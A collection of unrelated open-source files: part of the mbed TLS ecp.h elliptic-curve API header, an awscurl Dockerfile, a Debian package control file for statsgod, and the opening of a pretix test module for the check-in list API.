* not the size of \p N but the required size for private keys.
*
* If \p modp is NULL, reduction modulo \p P is done using a generic algorithm.
* Otherwise, \p modp must point to a function that takes an \p mbedtls_mpi in the
* range of <code>0..2^(2*pbits)-1</code>, and transforms it in-place to an integer
* which is congruent mod \p P to the given MPI, and is close enough to \p pbits
* in size, so that it may be efficiently brought in the 0..P-1 range by a few
* additions or subtractions. Therefore, it is only an approximative modular
* reduction. It must return 0 on success and non-zero on failure.
*
*/
typedef struct mbedtls_ecp_group
{
mbedtls_ecp_group_id id; /*!< An internal group identifier. */
mbedtls_mpi P; /*!< The prime modulus of the base field. */
mbedtls_mpi A; /*!< For Short Weierstrass: \p A in the equation. For
Montgomery curves: <code>(A + 2) / 4</code>. */
mbedtls_mpi B; /*!< For Short Weierstrass: \p B in the equation.
For Montgomery curves: unused. */
mbedtls_ecp_point G; /*!< The generator of the subgroup used. */
mbedtls_mpi N; /*!< The order of \p G. */
size_t pbits; /*!< The number of bits in \p P.*/
size_t nbits; /*!< For Short Weierstrass: The number of bits in \p P.
For Montgomery curves: the number of bits in the
private keys. */
unsigned int h; /*!< \internal 1 if the constants are static. */
int (*modp)(mbedtls_mpi *); /*!< The function for fast pseudo-reduction
mod \p P (see above).*/
int (*t_pre)(mbedtls_ecp_point *, void *); /*!< Unused. */
int (*t_post)(mbedtls_ecp_point *, void *); /*!< Unused. */
void *t_data; /*!< Unused. */
mbedtls_ecp_point *T; /*!< Pre-computed points for ecp_mul_comb(). */
size_t T_size; /*!< The number of pre-computed points. */
}
mbedtls_ecp_group;
/**
* \name SECTION: Module settings
*
* The configuration options you can set for this module are in this section.
* Either change them in config.h, or define them using the compiler command line.
* \{
*/
#if !defined(MBEDTLS_ECP_MAX_BITS)
/**
* The maximum size of the groups, that is, of \c N and \c P.
*/
#define MBEDTLS_ECP_MAX_BITS 521 /**< The maximum size of groups, in bits. */
#endif
#define MBEDTLS_ECP_MAX_BYTES ( ( MBEDTLS_ECP_MAX_BITS + 7 ) / 8 )
#define MBEDTLS_ECP_MAX_PT_LEN ( 2 * MBEDTLS_ECP_MAX_BYTES + 1 )
#if !defined(MBEDTLS_ECP_WINDOW_SIZE)
/*
* Maximum "window" size used for point multiplication.
* Default: 6.
* Minimum value: 2. Maximum value: 7.
*
* Result is an array of at most ( 1 << ( MBEDTLS_ECP_WINDOW_SIZE - 1 ) )
* points used for point multiplication. This value is directly tied to EC
* peak memory usage, so decreasing it by one should roughly cut memory usage
* by two (if large curves are in use).
*
* Reduction in size may reduce speed, but larger curves are impacted first.
* Sample performances (in ECDHE handshakes/s, with FIXED_POINT_OPTIM = 1):
* w-size: 6 5 4 3 2
* 521 145 141 135 120 97
* 384 214 209 198 177 146
* 256 320 320 303 262 226
* 224 475 475 453 398 342
* 192 640 640 633 587 476
*/
#define MBEDTLS_ECP_WINDOW_SIZE 6 /**< The maximum window size used. */
#endif /* MBEDTLS_ECP_WINDOW_SIZE */
#if !defined(MBEDTLS_ECP_FIXED_POINT_OPTIM)
/*
* Trade memory for speed on fixed-point multiplication.
*
* This speeds up repeated multiplication of the generator (that is, the
* multiplication in ECDSA signatures, and half of the multiplications in
* ECDSA verification and ECDHE) by a factor roughly 3 to 4.
*
* The cost is increasing EC peak memory usage by a factor roughly 2.
*
* Change this value to 0 to reduce peak memory usage.
*/
#define MBEDTLS_ECP_FIXED_POINT_OPTIM 1 /**< Enable fixed-point speed-up. */
#endif /* MBEDTLS_ECP_FIXED_POINT_OPTIM */
/* \} name SECTION: Module settings */
#else /* MBEDTLS_ECP_ALT */
#include "ecp_alt.h"
#endif /* MBEDTLS_ECP_ALT */
/**
* \brief The ECP key-pair structure.
*
* A generic key-pair that may be used for ECDSA and fixed ECDH, for example.
*
* \note Members are deliberately in the same order as in the
* ::mbedtls_ecdsa_context structure.
*/
typedef struct mbedtls_ecp_keypair
{
mbedtls_ecp_group grp; /*!< Elliptic curve and base point */
mbedtls_mpi d; /*!< our secret value */
mbedtls_ecp_point Q; /*!< our public value */
}
mbedtls_ecp_keypair;
/*
* Point formats, from RFC 4492's enum ECPointFormat
*/
#define MBEDTLS_ECP_PF_UNCOMPRESSED 0 /**< Uncompressed point format. */
#define MBEDTLS_ECP_PF_COMPRESSED 1 /**< Compressed point format. */
/*
* Some other constants from RFC 4492
*/
#define MBEDTLS_ECP_TLS_NAMED_CURVE 3 /**< The named_curve of ECCurveType. */
/**
* \brief This function retrieves the information defined in
* mbedtls_ecp_curve_info() for all supported curves in order
* of preference.
*
* \return A statically allocated array. The last entry is 0.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_list( void );
/**
* \brief This function retrieves the list of internal group
* identifiers of all supported curves in the order of
* preference.
*
* \return A statically allocated array,
* terminated with MBEDTLS_ECP_DP_NONE.
*/
const mbedtls_ecp_group_id *mbedtls_ecp_grp_id_list( void );
/**
* \brief This function retrieves curve information from an internal
* group identifier.
*
* \param grp_id An \c MBEDTLS_ECP_DP_XXX value.
*
* \return The associated curve information on success.
* \return NULL on failure.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_info_from_grp_id( mbedtls_ecp_group_id grp_id );
/**
* \brief This function retrieves curve information from a TLS
* NamedCurve value.
*
* \param tls_id An \c MBEDTLS_ECP_DP_XXX value.
*
* \return The associated curve information on success.
* \return NULL on failure.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_info_from_tls_id( uint16_t tls_id );
/**
* \brief This function retrieves curve information from a
* human-readable name.
*
* \param name The human-readable name.
*
* \return The associated curve information on success.
* \return NULL on failure.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_info_from_name( const char *name );
/**
* \brief This function initializes a point as zero.
*
* \param pt The point to initialize.
*/
void mbedtls_ecp_point_init( mbedtls_ecp_point *pt );
/**
* \brief This function initializes an ECP group context
* without loading any domain parameters.
*
* \note After this function is called, domain parameters
* for various ECP groups can be loaded through the
* mbedtls_ecp_load() or mbedtls_ecp_tls_read_group()
* functions.
*/
void mbedtls_ecp_group_init( mbedtls_ecp_group *grp );
/**
* \brief This function initializes a key pair as an invalid one.
*
* \param key The key pair to initialize.
*/
void mbedtls_ecp_keypair_init( mbedtls_ecp_keypair *key );
/**
* \brief This function frees the components of a point.
*
* \param pt The point to free.
*/
void mbedtls_ecp_point_free( mbedtls_ecp_point *pt );
/**
* \brief This function frees the components of an ECP group.
* \param grp The group to free.
*/
void mbedtls_ecp_group_free( mbedtls_ecp_group *grp );
/**
* \brief This function frees the components of a key pair.
* \param key The key pair to free.
*/
void mbedtls_ecp_keypair_free( mbedtls_ecp_keypair *key );
/**
* \brief This function copies the contents of point \p Q into
* point \p P.
*
* \param P The destination point.
* \param Q The source point.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_copy( mbedtls_ecp_point *P, const mbedtls_ecp_point *Q );
/**
* \brief This function copies the contents of group \p src into
* group \p dst.
*
* \param dst The destination group.
* \param src The source group.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_group_copy( mbedtls_ecp_group *dst, const mbedtls_ecp_group *src );
/**
* \brief This function sets a point to zero.
*
* \param pt The point to set.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_set_zero( mbedtls_ecp_point *pt );
/**
* \brief This function checks if a point is zero.
*
* \param pt The point to test.
*
* \return \c 1 if the point is zero.
* \return \c 0 if the point is non-zero.
*/
int mbedtls_ecp_is_zero( mbedtls_ecp_point *pt );
/**
* \brief This function compares two points.
*
* \note This assumes that the points are normalized. Otherwise,
* they may compare as "not equal" even if they are.
*
* \param P The first point to compare.
* \param Q The second point to compare.
*
* \return \c 0 if the points are equal.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if the points are not equal.
*/
int mbedtls_ecp_point_cmp( const mbedtls_ecp_point *P,
const mbedtls_ecp_point *Q );
/**
* \brief This function imports a non-zero point from two ASCII
* strings.
*
* \param P The destination point.
* \param radix The numeric base of the input.
* \param x The first affine coordinate, as a null-terminated string.
* \param y The second affine coordinate, as a null-terminated string.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_MPI_XXX error code on failure.
*/
int mbedtls_ecp_point_read_string( mbedtls_ecp_point *P, int radix,
const char *x, const char *y );
/**
* \brief This function exports a point into unsigned binary data.
*
* \param grp The group to which the point should belong.
* \param P The point to export.
* \param format The point format. Should be an \c MBEDTLS_ECP_PF_XXX macro.
* \param olen The length of the output.
* \param buf The output buffer.
* \param buflen The length of the output buffer.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA
* or #MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL on failure.
*/
int mbedtls_ecp_point_write_binary( const mbedtls_ecp_group *grp, const mbedtls_ecp_point *P,
int format, size_t *olen,
unsigned char *buf, size_t buflen );
/**
* \brief This function imports a point from unsigned binary data.
*
* \note This function does not check that the point actually
* belongs to the given group, see mbedtls_ecp_check_pubkey()
* for that.
*
* \param grp The group to which the point should belong.
* \param P The point to import.
* \param buf The input buffer.
* \param ilen The length of the input.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if input is invalid.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
* \return #MBEDTLS_ERR_ECP_FEATURE_UNAVAILABLE if the point format
* is not implemented.
*
*/
int mbedtls_ecp_point_read_binary( const mbedtls_ecp_group *grp, mbedtls_ecp_point *P,
const unsigned char *buf, size_t ilen );
/**
* \brief This function imports a point from a TLS ECPoint record.
*
 * \note On function return, \p buf is updated to point immediately
 * after the ECPoint record.
*
* \param grp The ECP group used.
* \param pt The destination point.
* \param buf The address of the pointer to the start of the input buffer.
* \param len The length of the buffer.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_MPI_XXX error code on initialization failure.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if input is invalid.
*/
int mbedtls_ecp_tls_read_point( const mbedtls_ecp_group *grp, mbedtls_ecp_point *pt,
const unsigned char **buf, size_t len );
/**
* \brief This function exports a point as a TLS ECPoint record.
*
* \param grp The ECP group used.
 * \param pt The point to export.
 * \param format The point format to export to. The point format is an
 * \c MBEDTLS_ECP_PF_XXX constant.
* \param olen The length of the data written.
* \param buf The buffer to write to.
* \param blen The length of the buffer.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA or
* #MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL on failure.
*/
int mbedtls_ecp_tls_write_point( const mbedtls_ecp_group *grp, const mbedtls_ecp_point *pt,
int format, size_t *olen,
unsigned char *buf, size_t blen );
/**
* \brief This function sets a group using standardized domain parameters.
*
* \note The index should be a value of the NamedCurve enum,
* as defined in <em>RFC-4492: Elliptic Curve Cryptography
* (ECC) Cipher Suites for Transport Layer Security (TLS)</em>,
* usually in the form of an \c MBEDTLS_ECP_DP_XXX macro.
*
* \param grp The destination group.
* \param id The identifier of the domain parameter set to load.
*
 * \return \c 0 on success.
 * \return An \c MBEDTLS_ERR_MPI_XXX error code on initialization failure.
 * \return #MBEDTLS_ERR_ECP_FEATURE_UNAVAILABLE for unknown groups.
*/
int mbedtls_ecp_group_load( mbedtls_ecp_group *grp, mbedtls_ecp_group_id id );
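/*
 * Illustrative sketch (error handling elided): loading the NIST P-256 domain
 * parameters into a freshly initialized group, then releasing it.
 *
 *     mbedtls_ecp_group grp;
 *     mbedtls_ecp_group_init( &grp );
 *     int ret = mbedtls_ecp_group_load( &grp, MBEDTLS_ECP_DP_SECP256R1 );
 *     ...
 *     mbedtls_ecp_group_free( &grp );
 */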
/**
* \brief This function sets a group from a TLS ECParameters record.
*
* \note \p buf is updated to point right after the ECParameters record
* on exit.
*
* \param grp The destination group.
* \param buf The address of the pointer to the start of the input buffer.
* \param len The length of the buffer.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_MPI_XXX error code on initialization failure.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if input is invalid.
*/
int mbedtls_ecp_tls_read_group( mbedtls_ecp_group *grp, const unsigned char **buf, size_t len );
/**
* \brief This function writes the TLS ECParameters record for a group.
*
* \param grp The ECP group used.
* \param olen The number of Bytes written.
* \param buf The buffer to write to.
* \param blen The length of the buffer.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL on failure.
*/
int mbedtls_ecp_tls_write_group( const mbedtls_ecp_group *grp, size_t *olen,
unsigned char *buf, size_t blen );
/**
* \brief This function performs multiplication of a point by
* an integer: \p R = \p m * \p P.
*
 * It is not thread-safe to use the same group in multiple threads.
*
* \note To prevent timing attacks, this function
* executes the exact same sequence of base-field
* operations for any valid \p m. It avoids any if-branch or
* array index depending on the value of \p m.
*
* \note If \p f_rng is not NULL, it is used to randomize
* intermediate results to prevent potential timing attacks
* targeting these results. We recommend always providing
* a non-NULL \p f_rng. The overhead is negligible.
*
* \param grp The ECP group.
* \param R The destination point.
* \param m The integer by which to multiply.
* \param P The point to multiply.
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY if \p m is not a valid private
* key, or \p P is not a valid public key.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_mul( mbedtls_ecp_group *grp, mbedtls_ecp_point *R,
const mbedtls_mpi *m, const mbedtls_ecp_point *P,
int (*f_rng)(void *, unsigned char *, size_t), void *p_rng );
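/*
 * Illustrative sketch (assumes grp holds a loaded group, d is a valid secret
 * scalar, and ctr_drbg is a seeded mbedtls_ctr_drbg_context): deriving the
 * public point R = d * G with randomized intermediate results.
 *
 *     mbedtls_ecp_point R;
 *     mbedtls_ecp_point_init( &R );
 *     ret = mbedtls_ecp_mul( &grp, &R, &d, &grp.G,
 *                            mbedtls_ctr_drbg_random, &ctr_drbg );
 */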
/**
* \brief This function performs multiplication and addition of two
* points by integers: \p R = \p m * \p P + \p n * \p Q
*
 * It is not thread-safe to use the same group in multiple threads.
*
* \note In contrast to mbedtls_ecp_mul(), this function does not
* guarantee a constant execution flow and timing.
*
* \param grp The ECP group.
* \param R The destination point.
* \param m The integer by which to multiply \p P.
* \param P The point to multiply by \p m.
* \param n The integer by which to multiply \p Q.
* \param Q The point to be multiplied by \p n.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY if \p m or \p n are not
* valid private keys, or \p P or \p Q are not valid public
* keys.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_muladd( mbedtls_ecp_group *grp, mbedtls_ecp_point *R,
const mbedtls_mpi *m, const mbedtls_ecp_point *P,
const mbedtls_mpi *n, const mbedtls_ecp_point *Q );
/**
* \brief This function checks that a point is a valid public key
* on this curve.
*
* It only checks that the point is non-zero, has
* valid coordinates and lies on the curve. It does not verify
* that it is indeed a multiple of \p G. This additional
* check is computationally more expensive, is not required
* by standards, and should not be necessary if the group
* used has a small cofactor. In particular, it is useless for
* the NIST groups which all have a cofactor of 1.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure, to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The curve the point should lie on.
* \param pt The point to check.
*
* \return \c 0 if the point is a valid public key.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY on failure.
*/
int mbedtls_ecp_check_pubkey( const mbedtls_ecp_group *grp, const mbedtls_ecp_point *pt );
/**
* \brief This function checks that an \p mbedtls_mpi is a valid private
* key for this curve.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The group used.
* \param d The integer to check.
*
* \return \c 0 if the point is a valid private key.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY on failure.
*/
int mbedtls_ecp_check_privkey( const mbedtls_ecp_group *grp, const mbedtls_mpi *d );
/**
* \brief This function generates a keypair with a configurable base
* point.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The ECP group.
* \param G The chosen base point.
* \param d The destination MPI (secret part).
* \param Q The destination point (public part).
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
 * \return         An \c MBEDTLS_ERR_ECP_XXX or \c MBEDTLS_ERR_MPI_XXX error code
* on failure.
*/
int mbedtls_ecp_gen_keypair_base( mbedtls_ecp_group *grp,
const mbedtls_ecp_point *G,
mbedtls_mpi *d, mbedtls_ecp_point *Q,
int (*f_rng)(void *, unsigned char *, size_t),
void *p_rng );
/**
* \brief This function generates an ECP keypair.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The ECP group.
* \param d The destination MPI (secret part).
* \param Q The destination point (public part).
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
 * \return         An \c MBEDTLS_ERR_ECP_XXX or \c MBEDTLS_ERR_MPI_XXX error code
* on failure.
*/
int mbedtls_ecp_gen_keypair( mbedtls_ecp_group *grp, mbedtls_mpi *d, mbedtls_ecp_point *Q,
int (*f_rng)(void *, unsigned char *, size_t),
void *p_rng );
/**
* \brief This function generates an ECP key.
*
* \param grp_id The ECP group identifier.
* \param key The destination key.
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
 * \return         An \c MBEDTLS_ERR_ECP_XXX or \c MBEDTLS_ERR_MPI_XXX error code
* on failure.
*/
int mbedtls_ecp_gen_key( mbedtls_ecp_group_id grp_id, mbedtls_ecp_keypair *key,
int (*f_rng)(void *, unsigned char *, size_t), void *p_rng );
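/*
 * Usage sketch (not part of the upstream header, added for context):
 * generating a keypair on secp256r1 with a CTR_DRBG as the RNG callback.
 * The names below follow the public mbed TLS 2.x API, where the keypair
 * members \c d and \c Q are accessible; error handling is abbreviated.
 *
 *     #include <string.h>
 *     #include "mbedtls/ecp.h"
 *     #include "mbedtls/entropy.h"
 *     #include "mbedtls/ctr_drbg.h"
 *
 *     mbedtls_ecp_keypair key;
 *     mbedtls_entropy_context entropy;
 *     mbedtls_ctr_drbg_context ctr_drbg;
 *     const char *pers = "ecp_gen_key";
 *     int ret;
 *
 *     mbedtls_ecp_keypair_init( &key );
 *     mbedtls_entropy_init( &entropy );
 *     mbedtls_ctr_drbg_init( &ctr_drbg );
 *
 *     ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy,
 *                                  (const unsigned char *) pers, strlen( pers ) );
 *     if( ret == 0 )
 *         ret = mbedtls_ecp_gen_key( MBEDTLS_ECP_DP_SECP256R1, &key,
 *                                    mbedtls_ctr_drbg_random, &ctr_drbg );
 *
 *     // On success, key.d holds the secret scalar and key.Q the public point.
 *
 *     mbedtls_ecp_keypair_free( &key );
 *     mbedtls_ctr_drbg_free( &ctr_drbg );
 *     mbedtls_entropy_free( &entropy );
 */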
/**
* \brief This function checks that the keypair objects
* \p pub and \p prv have the same group and the
* same public point, and that the private key in
* \p prv is consistent with the public key.
*
* \param pub The keypair structure holding the public key.
* If it contains a private key, that part is ignored.
* \param prv The keypair structure holding the full keypair.
*
* \return \c 0 on success, meaning that the keys are valid and match.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if the keys are invalid or do not match.
* \return An \c MBEDTLS_ERR_ECP_XXX or an \c MBEDTLS_ERR_MPI_XXX
* error code on calculation failure.
*/
int mbedtls_ecp_check_pub_priv( const mbedtls_ecp_keypair *pub, const mbedtls_ecp_keypair *prv );
#if defined(MBEDTLS_SELF_TEST)
/**
* \brief The ECP checkup routine.
*
* \return \c 0 on success.
* \return \c 1 on failure.
*/
int mbedtls_ecp_self_test( int verbose );
#endif /* MBEDTLS_SELF_TEST */
#ifdef __cplusplus
}
#endif
#endif /* ecp.h */
| {
"pile_set_name": "Github"
} |
FROM python:2.7-alpine
COPY . /
RUN set -ex \
&& apk add --no-cache --virtual .build-deps \
build-base \
libffi-dev \
libxml2-dev \
openssl-dev \
&& apk add --no-cache --virtual .run-deps \
libxslt-dev \
&& pip install -r requirements.txt \
&& apk del .build-deps
ENTRYPOINT ["python", "-m", "awscurl.awscurl"]
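# Usage sketch (not part of the original Dockerfile; the image tag and URL are
# illustrative). awscurl reads AWS credentials from the standard environment
# variables, so they can be passed through at run time:
#
#   docker build -t awscurl .
#   docker run --rm \
#     -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_DEFAULT_REGION \
#     awscurl https://example.execute-api.us-east-1.amazonaws.com/prod/ping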
| {
"pile_set_name": "Github"
} |
Source: statsgod
Section: web
Priority: optional
Maintainer: Acquia <[email protected]>
Build-Depends: debhelper (>= 9.0.0)
Standards-Version: 3.9.5
Homepage: http://github.com/acquia/statsgod
Package: statsgod
Section: web
Priority: extra
Architecture: amd64
Depends: ${shlibs:Depends}, ${misc:Depends}
Description: Network metric aggregator.
Metrics are sent using TCP, UDP or Unix sockets then aggregated and relayed to
a backend service.
| {
"pile_set_name": "Github"
} |
import datetime
import time
from decimal import Decimal
from unittest import mock
import pytest
from django.utils.timezone import now
from django_countries.fields import Country
from django_scopes import scopes_disabled
from i18nfield.strings import LazyI18nString
from pytz import UTC
from pretix.api.serializers.item import QuestionSerializer
from pretix.base.models import (
Checkin, CheckinList, InvoiceAddress, Order, OrderPosition,
)
@pytest.fixture
def item(event):
return event.items.create(name="Budget Ticket", default_price=23)
@pytest.fixture
def item_on_wrong_event(event2):
return event2.items.create(name="Budget Ticket", default_price=23)
@pytest.fixture
def other_item(event):
return event.items.create(name="Budget Ticket", default_price=23)
@pytest.fixture
def order(event, item, other_item, taxrule):
testtime = datetime.datetime(2017, 12, 1, 10, 0, 0, tzinfo=UTC)
with mock.patch('django.utils.timezone.now') as mock_now:
mock_now.return_value = testtime
o = Order.objects.create(
code='FOO', event=event, email='[email protected]',
status=Order.STATUS_PAID, secret="k24fiuwvu8kxz3y1",
datetime=datetime.datetime(2017, 12, 1, 10, 0, 0, tzinfo=UTC),
expires=datetime.datetime(2017, 12, 10, 10, 0, 0, tzinfo=UTC),
total=46, locale='en'
)
InvoiceAddress.objects.create(order=o, company="Sample company", country=Country('NZ'))
OrderPosition.objects.create(
order=o,
positionid=1,
item=item,
variation=None,
price=Decimal("23"),
attendee_name_parts={'full_name': "Peter"},
secret="z3fsn8jyufm5kpk768q69gkbyr5f4h6w",
pseudonymization_id="ABCDEFGHKL",
)
OrderPosition.objects.create(
order=o,
positionid=2,
item=other_item,
variation=None,
price=Decimal("23"),
attendee_name_parts={'full_name': "Michael"},
secret="sf4HZG73fU6kwddgjg2QOusFbYZwVKpK",
pseudonymization_id="BACDEFGHKL",
)
return o
TEST_ORDERPOSITION1_RES = {
"id": 1,
"require_attention": False,
"order__status": "p",
"order": "FOO",
"positionid": 1,
"item": 1,
"variation": None,
"price": "23.00",
"attendee_name": "Peter",
"attendee_name_parts": {'full_name': "Peter"},
"attendee_email": None,
"voucher": None,
"tax_rate": "0.00",
"tax_value": "0.00",
"tax_rule": None,
"secret": "z3fsn8jyufm5kpk768q69gkbyr5f4h6w",
"addon_to": None,
"checkins": [],
"downloads": [],
"answers": [],
"seat": None,
"company": None,
"street": None,
"zipcode": None,
"city": None,
"country": None,
"state": None,
"subevent": None,
"pseudonymization_id": "ABCDEFGHKL",
}
TEST_ORDERPOSITION2_RES = {
"id": 2,
"require_attention": False,
"order__status": "p",
"order": "FOO",
"positionid": 2,
"item": 1,
"variation": None,
"price": "23.00",
"attendee_name": "Michael",
"attendee_name_parts": {'full_name': "Michael"},
"attendee_email": None,
"voucher": None,
"tax_rate": "0.00",
"tax_value": "0.00",
"tax_rule": None,
"secret": "sf4HZG73fU6kwddgjg2QOusFbYZwVKpK",
"addon_to": None,
"checkins": [],
"downloads": [],
"answers": [],
"seat": None,
"company": None,
"street": None,
"zipcode": None,
"city": None,
"country": None,
"state": None,
"subevent": None,
"pseudonymization_id": "BACDEFGHKL",
}
TEST_LIST_RES = {
"name": "Default",
"all_products": False,
"limit_products": [],
"position_count": 0,
"checkin_count": 0,
"include_pending": False,
"allow_multiple_entries": False,
"allow_entry_after_exit": True,
"subevent": None,
"rules": {}
}
@pytest.fixture
def clist(event, item):
c = event.checkin_lists.create(name="Default", all_products=False)
c.limit_products.add(item)
return c
@pytest.fixture
def clist_all(event, item):
c = event.checkin_lists.create(name="Default", all_products=True)
return c
@pytest.mark.django_db
def test_list_list(token_client, organizer, event, clist, item, subevent):
res = dict(TEST_LIST_RES)
res["id"] = clist.pk
res["limit_products"] = [item.pk]
res["auto_checkin_sales_channels"] = []
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug))
assert resp.status_code == 200
assert [res] == resp.data['results']
clist.subevent = subevent
clist.save()
res["subevent"] = subevent.pk
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent={}'.format(organizer.slug, event.slug, subevent.pk))
assert [res] == resp.data['results']
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent_match={}'.format(organizer.slug, event.slug, subevent.pk))
assert [res] == resp.data['results']
with scopes_disabled():
se2 = event.subevents.create(name="Foobar", date_from=datetime.datetime(2017, 12, 27, 10, 0, 0, tzinfo=UTC))
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent={}'.format(organizer.slug, event.slug, se2.pk))
assert [] == resp.data['results']
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent_match={}'.format(organizer.slug, event.slug, se2.pk))
assert [] == resp.data['results']
clist.subevent = None
clist.save()
res["subevent"] = None
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent_match={}'.format(organizer.slug, event.slug, se2.pk))
assert [res] == resp.data['results']
@pytest.mark.django_db
def test_list_detail(token_client, organizer, event, clist, item):
res = dict(TEST_LIST_RES)
res["id"] = clist.pk
res["limit_products"] = [item.pk]
res["auto_checkin_sales_channels"] = []
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/'.format(organizer.slug, event.slug,
clist.pk))
assert resp.status_code == 200
assert res == resp.data
@pytest.mark.django_db
def test_list_create(token_client, organizer, event, item, item_on_wrong_event):
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": False,
"subevent": None,
"rules": {"==": [0, 1]}
},
format='json'
)
assert resp.status_code == 201
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert cl.name == "VIP"
assert cl.limit_products.count() == 1
assert not cl.all_products
assert cl.rules == {"==": [0, 1]}
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": False,
"subevent": None,
"auto_checkin_sales_channels": [
"web"
]
},
format='json'
)
assert resp.status_code == 201
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert cl.name == "VIP"
assert cl.limit_products.count() == 1
assert not cl.all_products
assert "web" in cl.auto_checkin_sales_channels
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item_on_wrong_event.pk],
"all_products": True,
"subevent": None
},
format='json'
)
assert resp.status_code == 400
assert resp.content.decode() == '{"non_field_errors":["One or more items do not belong to this event."]}'
@pytest.mark.django_db
def test_list_create_with_subevent(token_client, organizer, event, event3, item, subevent, subevent2):
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": True,
"subevent": subevent.pk
},
format='json'
)
assert resp.status_code == 201
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": True,
"subevent": subevent.pk,
"auto_checkin_sales_channels": [
"web"
]
},
format='json'
)
assert resp.status_code == 201
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert "web" in cl.auto_checkin_sales_channels
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": True,
"subevent": None
},
format='json'
)
assert resp.status_code == 201
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [],
"all_products": True,
"subevent": subevent2.pk
},
format='json'
)
assert resp.status_code == 400
assert resp.content.decode() == '{"non_field_errors":["The subevent does not belong to this event."]}'
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event3.slug),
{
"name": "VIP",
"limit_products": [],
"all_products": True,
"subevent": subevent2.pk
},
format='json'
)
assert resp.status_code == 400
assert resp.content.decode() == '{"non_field_errors":["The subevent does not belong to this event."]}'
@pytest.mark.django_db
def test_list_update(token_client, organizer, event, clist):
resp = token_client.patch(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/'.format(organizer.slug, event.slug, clist.pk),
{
"name": "VIP",
},
format='json'
)
